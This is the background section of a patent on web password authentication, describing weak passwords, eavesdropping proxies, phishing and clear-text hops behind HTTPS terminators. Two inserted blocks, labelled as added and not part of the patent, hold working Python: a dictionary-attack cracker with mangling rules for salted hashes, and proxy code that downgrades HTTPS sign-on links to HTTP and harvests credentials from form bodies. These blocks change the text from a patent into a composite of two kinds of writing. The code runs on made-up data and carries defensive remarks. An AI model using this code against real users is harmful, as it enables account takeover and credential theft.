1. Technical Field
The present invention generally relates to network transactions and, more particularly, to facilitating user authentication over a network.
2. Related Art
Presently, many online web-based applications use password-based user identity authentication. That is, a user is typically required to provide a user ID and password as proof of identity before using an application. Generally, web-application users select a password out-of-band, in a process known as registration with the site that is separate from later sign-on. Registration may be carried out over a secure communication channel (e.g., HTTPS), and it is during this process that the user selects the password. During an authentication process, the password, as typed by the user, is sent over the network to the web application. In many cases, this password exchange occurs over a secure communication session. Typically, the user provides the known password when prompted by the web application.
Even though password authentication is used in many web application settings, it raises many security concerns. For example, many passwords chosen by web users are weak: they are typically short, use few of the allowable characters, and are often easily guessable because they are based on the name of the user's child or pet, the user's hobbies, etc. In general, weak passwords may be easily compromised by attackers using automated techniques such as a dictionary attack.
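The following is an added example, not part of the patent text, of the dictionary attack referred to above. It assumes an attacker has obtained a table of salted password hashes (a constructed table, not from any real system) and tries a small wordlist of the kind built from names, pets and hobbies, with common mangling rules (capitalisation, digit and year suffixes). The hash function, the wordlist and the user records are all assumptions made for the example.

```python
"""Dictionary attack against a table of salted password hashes.

Added example: every record, salt and wordlist entry below is constructed
for illustration. The table uses single-round salted SHA-256, which is
deliberately cheap so that the attack runs in milliseconds.
"""
import hashlib
import os


def hash_password(password: str, salt: bytes) -> bytes:
    # Assumed storage format: SHA-256(salt || password), one round.
    return hashlib.sha256(salt + password.encode()).digest()


def make_record(username: str, password: str) -> dict:
    salt = os.urandom(8)
    return {"user": username, "salt": salt, "hash": hash_password(password, salt)}


# Constructed "leaked" table: four human-chosen passwords and one random one.
LEAKED = [
    make_record("alice", "fluffy"),
    make_record("bob", "Jessica1"),
    make_record("carol", "football"),
    make_record("dave", "fluffy2008"),
    make_record("erin", "xK9#vQ2!mL7$pZ4w"),
]

# Constructed wordlist built from likely names, pets and hobbies.
WORDLIST = ["fluffy", "jessica", "football", "soccer", "max", "rex", "password"]


def mangle(word: str):
    """Yield common variants of a word: as typed, capitalised, upper-cased,
    and each of those with a single digit or a year (1990-2010) appended."""
    bases = {word, word.capitalize(), word.upper()}
    for b in bases:
        yield b
        for d in range(10):
            yield f"{b}{d}"
        for year in range(1990, 2011):
            yield f"{b}{year}"


def dictionary_attack(records, wordlist) -> dict:
    """Return {username: recovered_password} for every record whose hash
    matches some mangled wordlist candidate. Each record is salted, so the
    candidate must be re-hashed per record; the cost is still tiny."""
    cracked = {}
    for rec in records:
        for word in wordlist:
            for cand in mangle(word):
                if hash_password(cand, rec["salt"]) == rec["hash"]:
                    cracked[rec["user"]] = cand
                    break
            if rec["user"] in cracked:
                break
    return cracked


if __name__ == "__main__":
    # The four name/pet/hobby-derived passwords fall; the random one does not.
    print(dictionary_attack(LEAKED, WORDLIST))
```

The salt defeats precomputed tables but not the guessing itself: with 7 words and 96 variants each, fewer than 700 candidates per user suffice to recover every human-chosen password, while the 16-character random one is never reached. A slow, memory-hard hash (bcrypt, scrypt, Argon2) raises the per-guess cost but does not change the conclusion for passwords this weak.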
In another example, since a password is sent over a network, data and information may leak to a man-in-the-middle who has successfully eavesdropped on traffic transferred over the network. Eavesdropping can be accomplished with ease and in more common settings than is generally noticed. For instance, many banks and web applications (e.g., electronic commerce (eCommerce) pages) serve their navigation pages over HTTP and redirect users to a secure HTTPS page only when they are ready to sign on. By then it may already be too late if an eavesdropper or man-in-the-middle has been able to proxy the user's request. If the attacker can carry out a DNS (Domain Name System) attack and redirect the site's name to its own proxy, users may believe they are connecting securely to their bank or eCommerce site when in fact they are connecting to the proxy, which in turn holds a secure connection to the end site. At this point, any confidential information entered by users may be compromised.
In another example, password-based authentication is prone to phishing attacks, in which users are redirected without their knowledge to a phishing site and are then asked for confidential information, including passwords.
In another example, many password authentication protocols rely on HTTPS for secure end-to-end transmission of passwords over the network. However, in many high-volume eCommerce and financial settings, HTTPS is terminated at the edge of the web application network. As such, any confidential data in the payload (e.g., passwords or related hash values) may travel the remainder of the path over standard HTTP, in clear text in many cases.
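The following is an added example, not part of the patent text, covering two of the cases above: the proxy that sits between the user and the end site (the eavesdropping example) and the clear-text segment behind an HTTPS terminator (the preceding paragraph). It models only the proxy's two essential operations on constructed data: rewriting the origin's HTTPS sign-on link so the browser stays on plain HTTP, and harvesting credentials from a form body that arrives in clear text. The host name bank.example, the page and the form body are assumptions; no real site or network traffic is involved.

```python
"""Link-downgrading proxy logic and clear-text credential harvesting.

Added example. The proxy holds the HTTPS connection to the real site and
serves the victim plain HTTP; because the victim's DNS already resolves the
site's name to the proxy, the host name is kept and only the scheme changes.
The same harvester applies, unchanged, to any hop behind an HTTPS terminator
where the request body travels as plain HTTP.
"""
import re
from urllib.parse import parse_qs

ORIGIN = "bank.example"  # assumed placeholder host

# Constructed navigation page as the origin would serve it over HTTP, with
# the sign-on form pointing at its HTTPS endpoint and one third-party link.
ORIGIN_PAGE = (
    '<a href="http://bank.example/accounts">Accounts</a>\n'
    '<a href="https://cdn.example/help">Help</a>\n'
    '<form method="post" action="https://bank.example/login">\n'
    '<input name="user"><input name="pass" type="password"></form>\n'
)

_LINK = re.compile(r'(href|action)="https://([^"/]+)(/[^"]*)?"')


def downgrade_links(html: str, origin: str = ORIGIN) -> tuple[str, list[str]]:
    """Rewrite every https:// href/action that points at `origin` to http://,
    leaving other hosts untouched. Returns (rewritten_html, paths_rewritten)."""
    rewritten: list[str] = []

    def sub(m: re.Match) -> str:
        attr, host, path = m.group(1), m.group(2), m.group(3) or "/"
        if host != origin:
            return m.group(0)
        rewritten.append(path)
        return f'{attr}="http://{host}{path}"'

    return _LINK.sub(sub, html), rewritten


def harvest_credentials(form_body: str) -> dict:
    """Pull the user and password fields from an application/x-www-form-urlencoded
    body observed in clear text. A hashed password in the same field is just as
    useful to the observer, since it can be replayed to the real site."""
    fields = parse_qs(form_body)
    return {k: v[0] for k, v in fields.items() if k in ("user", "pass")}


if __name__ == "__main__":
    page, paths = downgrade_links(ORIGIN_PAGE)
    print("rewritten:", paths)
    print(page)
    # Constructed POST body, as the victim's browser would send it over HTTP.
    print(harvest_credentials("user=alice&pass=fluffy&remember=1"))
```

The rewrite is the whole trick: the origin never sees anything unusual, because the proxy forwards the victim's clear-text POST over its own HTTPS session, and the victim sees the expected pages, minus the lock icon. Serving the navigation page itself over HTTPS and marking the host HSTS removes the plain-HTTP window the rewrite depends on; it does nothing for the edge-terminated case, where the clear-text hop is inside the operator's own network.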
Accordingly, there exists a need to improve network security when authenticating user identity so as to inhibit illicit access to personal data and information.